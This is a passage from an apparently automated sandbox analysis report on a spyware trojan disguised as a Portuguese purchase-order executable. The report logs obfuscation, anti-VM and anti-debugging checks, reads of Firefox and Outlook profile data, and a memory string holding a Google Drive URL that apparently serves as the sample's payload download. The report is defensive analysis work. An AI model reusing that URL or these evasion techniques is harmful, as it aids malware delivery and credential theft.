Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657971E00 26_2_00007FF657971E00
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65796DD9C 26_2_00007FF65796DD9C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657951D78 26_2_00007FF657951D78
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657923CE0 26_2_00007FF657923CE0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65796CCC8 26_2_00007FF65796CCC8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF6578F9CFC 26_2_00007FF6578F9CFC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657911D00 26_2_00007FF657911D00
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65796BC60 26_2_00007FF65796BC60
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657913C87 26_2_00007FF657913C87
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657921C10 26_2_00007FF657921C10
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657969B34 26_2_00007FF657969B34
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65791AA68 26_2_00007FF65791AA68
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65796BA74 26_2_00007FF65796BA74
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657920AB0 26_2_00007FF657920AB0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65796D9D0 26_2_00007FF65796D9D0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF6578FB944 26_2_00007FF6578FB944
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657971950 26_2_00007FF657971950
PE file contains strange resources
Source: LISTA DE PEDIDO DE COMPRA.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edgegdi.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Section loaded: edgegdi.dll
Uses 32bit PE files
Source: LISTA DE PEDIDO DE COMPRA.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Deletes files inside the Windows folder
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe File deleted: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe
Creates files inside the system directory
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9
Found potential string decryption / allocating functions
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: String function: 00007FF657900DB4 appears 56 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: String function: 00007FF657900D88 appears 41 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: String function: 00007FF65795BAAC appears 36 times
Contains functionality to call native functions
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65790C444 NtQueryInformationProcess,NtQueryInformationProcess,FindCloseChangeNotification,CloseHandle, 26_2_00007FF65790C444
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657909FF0 NtSetInformationFile, 26_2_00007FF657909FF0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657915DB4 NtQueryInformationFile,NtQueryInformationFile,RtlNtStatusToDosError, 26_2_00007FF657915DB4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657915B80 ReadFile,FlushFileBuffers,SetEndOfFile,NtSetInformationFile, 26_2_00007FF657915B80
PE file does not import any functions
Source: mpasdlta.vdm.25.dr Static PE information: No import functions for PE file found
Source: mpavdlta.vdm.25.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: LISTA DE PEDIDO DE COMPRA.exe, 00000001.00000002.3240243274.0000000000415000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUnseaming.exe vs LISTA DE PEDIDO DE COMPRA.exe
Source: LISTA DE PEDIDO DE COMPRA.exe Binary or memory string: OriginalFilenameUnseaming.exe vs LISTA DE PEDIDO DE COMPRA.exe
Enables security privileges
Source: C:\Windows\System32\wevtutil.exe Process token adjusted: Security
Source: LISTA DE PEDIDO DE COMPRA.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: classification engine Classification label: mal100.spre.troj.spyw.evad.winEXE@13/5@3/3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF6578FB0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle, 26_2_00007FF6578FB0C8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657911AE0 FindResourceW,GetLastError,LoadResource,GetLastError,LockResource,GetLastError,SizeofResource,GetLastError, 26_2_00007FF657911AE0
Source: LISTA DE PEDIDO DE COMPRA.exe, 00000001.00000002.3240216938.0000000000414000.00000004.00020000.sdmp Binary or memory string: n.s$n.s,n.s4n.s<n.sDn.sLn.sTn.s\n.sdn.sln.stn.s|n.s
Source: LISTA DE PEDIDO DE COMPRA.exe ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe 'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe'
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-1ba0cab.exe' /q WD
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe /stub 1.1.18500.10 /payload 1.349.1503.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-1ba0cab.exe /q WD
Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\6E33F3E4-DD3F-9BF4-EC8E-12828A11375C.man
Source: C:\Windows\System32\wevtutil.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\6E33F3E4-DD3F-9BF4-EC8E-12828A11375C.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Source: C:\Windows\System32\wevtutil.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe'
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe /stub 1.1.18500.10 /payload 1.349.1503.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-1ba0cab.exe /q WD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65795F118 LookupPrivilegeValueW,GetCurrentProcess,CloseHandle,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle, 26_2_00007FF65795F118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe File created: C:\Users\user\AppData\Local\Temp\~DF99B78B61EDC895B1.TMP
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65790B1C4 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetLastError,Process32FirstW,GetLastError,Process32NextW,GetLastError,FindCloseChangeNotification,CloseHandle, 26_2_00007FF65790B1C4
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5540:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5540:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3480:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3480:120:WilError_03
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Binary string: MpSigStub.pdbGCTL source: mpam-1ba0cab.exe, 00000019.00000003.6149251039.0000020B4D841000.00000004.00000001.sdmp, MpSigStub.exe, 0000001A.00000002.6241664412.00007FF657987000.00000002.00020000.sdmp, MpSigStub.exe.25.dr
Source: Binary string: MpAdlStub.pdbGCTL source: mpam-1ba0cab.exe, 00000019.00000002.6244546959.00007FF7E3A9F000.00000002.00020000.sdmp
Source: Binary string: MpAdlStub.pdb source: mpam-1ba0cab.exe, 00000019.00000002.6244546959.00007FF7E3A9F000.00000002.00020000.sdmp
Source: Binary string: MpSigStub.pdb source: mpam-1ba0cab.exe, 00000019.00000003.6149251039.0000020B4D841000.00000004.00000001.sdmp, MpSigStub.exe, 0000001A.00000002.6241664412.00007FF657987000.00000002.00020000.sdmp, MpSigStub.exe.25.dr

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe Code function: 1_2_0040747B pushfd ; ret 1_2_00407495
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe Code function: 1_2_0040401B push ds; ret 1_2_00404027
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe Code function: 1_2_00406946 push ebx; ret 1_2_0040694C
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe Code function: 1_2_004085A7 push edx; ret 1_2_004085A8
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe Code function: 1_2_02273A1F push esi; iretd 1_2_02273A20
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe Code function: 1_2_0227106C pushfd ; retf 1_2_022710AA
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe Code function: 1_2_02270EAE push edx; retf 1_2_02270EAF
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe Code function: 1_2_02272CC4 push ds; ret 1_2_02272CCA
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe Code function: 1_2_02272F47 push esp; iretd 1_2_02272F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00A3C43D push FFFFFFB9h; retf 10_2_00A3C448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00A3C41E push FFFFFFB9h; retf 10_2_00A3C429
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1C9824E8 pushfd ; iretd 10_2_1C982531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1FEAF8B8 pushad ; iretd 10_2_1FEAF8C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1FEA7088 push esp; iretd 10_2_1FEA7089
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1FEA708C pushfd ; iretd 10_2_1FEA7171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1FEA703C pushad ; iretd 10_2_1FEA7081

Persistence and Installation Behavior:

Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpasdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpavdlta.vdm
Drops PE files
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpasdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpavdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpasdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpavdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF6578FB0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle, 26_2_00007FF6578FB0C8

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: LISTA DE PEDIDO DE COMPRA.exe, 00000001.00000002.3241088664.0000000002250000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7777894312.0000000000CB0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: RegAsm.exe, 0000000A.00000002.7777894312.0000000000CB0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1S2E4RMU8PYTHWRTHVB17QS1CJAOOPUG3WININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Source: LISTA DE PEDIDO DE COMPRA.exe, 00000001.00000002.3241088664.0000000002250000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
Source: LISTA DE PEDIDO DE COMPRA.exe, 00000001.00000002.3240672547.0000000000684000.00000004.00000020.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1640 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 9941 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpasdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpavdlta.vdm Jump to dropped file
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: LISTA DE PEDIDO DE COMPRA.exe, 00000001.00000002.3241088664.0000000002250000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
Source: RegAsm.exe, 0000000A.00000002.7778539921.0000000000DBA000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: LISTA DE PEDIDO DE COMPRA.exe, 00000001.00000002.3241088664.0000000002250000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7777894312.0000000000CB0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: RegAsm.exe, 0000000A.00000002.7777894312.0000000000CB0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3wininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: LISTA DE PEDIDO DE COMPRA.exe, 00000001.00000002.3240672547.0000000000684000.00000004.00000020.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65795B030 FindNextFileW,FindClose,FindFirstFileW, 26_2_00007FF65795B030
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65795ADEC FindFirstFileW,FindNextFileW,FindClose,FindClose, 26_2_00007FF65795ADEC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65790F810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle, 26_2_00007FF65790F810
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657982504 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 26_2_00007FF657982504
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
